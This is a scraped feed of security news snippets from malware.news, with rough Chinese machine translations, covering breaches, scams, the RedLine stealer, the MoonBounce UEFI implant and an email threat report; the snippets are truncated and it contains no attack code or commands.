Article Link: Fortune favours the breached: Crypto.com admits 400 users hit in hack | ZDNet
1 post - 1 participant
Read full topic
首席执行官克里斯马尔萨莱克说,所有受影响的用户在同一天得到全额补偿。
文章链接: 《财富》赞同被攻破: crypto 网承认有400个用户被黑客攻击
1名1岁以后的参与者
阅读完整主题
2022年1月21日 01:10malware.news
Enhancements:
A new version of 365 Total Protection has been introduced, including 365 Total Backup. Thus, the initial setup has been simplified.
In the log entries in the “Auditing 2.0” module, the values that have been changed by an event are now highlighted by shading.
In the “Email Live Tracking” module, new icons for the direction of emails have been introduced.
In the scope selection, a new icon for partners has been introduced.
Improvements
Several improvements have been made to Hornet.email Webmail, the web client of our Hornet.email service.
In the “Email Live Tracking” module, an error in displaying archived emails has been fixed.
In the “Mailbox Reassignment” tab of the “Mailboxes” module, a warning message has been improved.
When uploading a logo in the “Email template” tab of the “Customization” module, the MIME type of the file is now also checked. Only .png logos are accepted.
In the “Email Authentication” module, an error while clicking on the advanced options has been fixed.
In the “Email Aut
2022年1月21日 01:10malware.news
Singapore Police Force issues advisory note cautioning the public of advertisements featured on Google’s search platform that contain fake bank hotlines, adding that these scams already have resulted in losses of more than S$495,000 ($367,775).
Article Link: Singapore police warns of ad scams targeting Google search users | ZDNet
1 post - 1 participant
Read full topic
新加坡警察部队(Singapore Police Force)发布了一份警告性说明,提醒公众注意谷歌(Google)搜索平台上的广告含有假冒的银行热线电话,并补充称,这些骗局已经导致逾49.5万新元(合36.777万美元)的损失。
文章链接: 新加坡警方警告针对谷歌搜索用户的广告欺诈 | ZDNet
1名1岁以后的参与者
阅读完整主题
2022年1月21日 01:10malware.news
These days WordPress infections are very common. In 2021, internetlivestats.com counted over 81 million websites hacked. If you’re one of the millions, you need to take action to fix and protect your site. Of course, a hacked site will put any site owner into panic mode. This article will provide insight on what to do if your website is hacked and how to move forward. WordPress sites can be hacked due to a variety of reasons, which we cover in Why are WordPress sites targeted by hackers?
Continue reading What Should You do if Your WordPress Site was Hacked? at Sucuri Blog.
The post What Should You do if Your WordPress Site was Hacked? appeared first on Security Boulevard.
Article Link: What Should You do if Your WordPress Site was Hacked? - Security Boulevard
1 post - 1 participant
Read full topic
现在 WordPress 的感染非常普遍。2021年, internetlivestats.com 统计了超过8100万个网站被黑客攻击。如果你是百万中的一员,你需要采取行动来修复和保护你的网站。当然,被黑客攻击的网站会让任何网站所有者陷入恐慌。这篇文章将提供洞察如果你的网站被黑客入侵该怎么做,以及如何向前推进。由于各种原因 WordPress 站点可能会被黑客攻击,我们在《为什么 WordPress 站点会成为黑客攻击的目标
2022年1月21日 01:10malware.news
Victims were conned out of thousands of pounds, including one woman who was terminally ill.
Article Link: 'Serial' romance fraudster jailed for trying to scam 670 people in the UK | ZDNet
1 post - 1 participant
Read full topic
受害者被骗走了数千英镑,其中包括一名身患绝症的妇女。
文章链接: 连环爱情诈骗犯试图诈骗英国670人而入狱 | ZDNet
1名1岁以后的参与者
阅读完整主题
2022年1月21日 01:10malware.news
Here is a piece of malicious Python script that injects a RedLine[1] stealer into its own process. Process injection is a common attacker’s technique these days (for a long time already). The difference, in this case, is that the payload is delivered through FTP! It’s pretty unusual because FTP is today less and less used for multiple reasons (lack of encryption by default, complex to filter with those passive/active modes). Support for FTP has even been disabled by default in Chrome starting with version 95! But FTP remains a common protocol in the IoT/Linux landscape with malware families like Mirai. My honeypots still collect a lot of Mirai samples on FTP servers. I don’t understand why the attacker chose this protocol because, in most corporate environments, FTP is not allowed by default (and should definitely not be!).
Article Link: RedLine Stealer Delivered Through FTP
1 post - 1 participant
Read full topic
下面是一段恶意的 Python 脚本,它在自己的进程中注入了一个 RedLine [1]偷取者。进程注入是目前常见的攻击者技术(已经很长时间)。不同的是,在这种情况下,有效载荷是通过 FTP 传
2022年1月21日 01:10malware.news
What happened?
At the end of 2021, we were made aware of a UEFI firmware-level compromise through logs from our Firmware Scanner, which has been integrated into Kaspersky products since the beginning of 2019. Further analysis has shown that a single component within the inspected firmware’s image was modified by attackers in a way that allowed them to intercept the original execution flow of the machine’s boot sequence and introduce a sophisticated infection chain.
By examining the components of the rogue firmware and other malicious artefacts from the target’s network, we were able to reach the following conclusions:
The inspected UEFI firmware was tampered with to embed a malicious code that we dub MoonBounce;
Due to its emplacement on SPI flash which is located on the motherboard instead of the hard disk, the implant is capable of persisting in the system across disk formatting or replacement;
The purpose of the implant is to facilitate the deployment of user-mode malware that stages execution of further p
2022年1月21日 01:10malware.news
Multichain messaging seems confusing, at best.
Article Link: Multichain token hack losses reach $3 million: report | ZDNet
1 post - 1 participant
Read full topic
多链消息传递充其量也只是让人感到困惑。
文章链接: 多链令牌黑客损失达到300万美元
1名1岁以后的参与者
阅读完整主题
2022年1月21日 01:10malware.news
This blog was written by an independent guest blogger.
Non-fungible tokens (NFTs) are the new player in the financial investment market. They’ve seen tremendous interest from a wide range of parties, whether that be institutional investors or retail hobbyists looking to find an angle. As with anything involving money, malicious actors are already starting to take hold; Insider magazine recently highlighted the 265 Ethereum (roughly $1.1 million) theft due to a fraudulent NFT scheme.
Just as cybersecurity has needed frequent and substantial improvements to shore up the security scene, so have NFTs, and those who purchase them. Funnily enough, the key to protecting NFTs is first understanding their financial liability and the laws governing them.
Governmental regulations
Cryptocurrency has been subjected to a rapidly changing balance of laws for the government to try and control it through regulation. NFTs are much the same; while they have entered the market as a form of ultra-modern art exchange, they are sti
2022年1月21日 01:10malware.news
<div> <div> <div> <div><h2>Summary</h2>
In this installment of our monthly email threat review, we present an overview of the email-based threats observed in December 2021 and compare them to the previous month’s threats.
The report provides insights into:
Unwanted emails by category
File types used in attacks
Industry Email Threat Index
Attack techniques
Impersonated company brands and organizations
Unwanted emails by category
The following table shows the distribution of unwanted emails per category.
Email category
%
Rejected
80.70
Spam
14.27
Threat
4.15
AdvThreat
0.84
Content
0.04
The following time histogram shows the email volume per category per day.
Readers of our previous reports likely already guessed that the spike in rejected emails at the start of December can be attributed to a large-scale monthly re-occurring sextortion scam spam campaign targeting German-speaking victims.
Methodology
The listed email categories correspond to the email categories listed in the Email Live Tracking of Hornetsecuri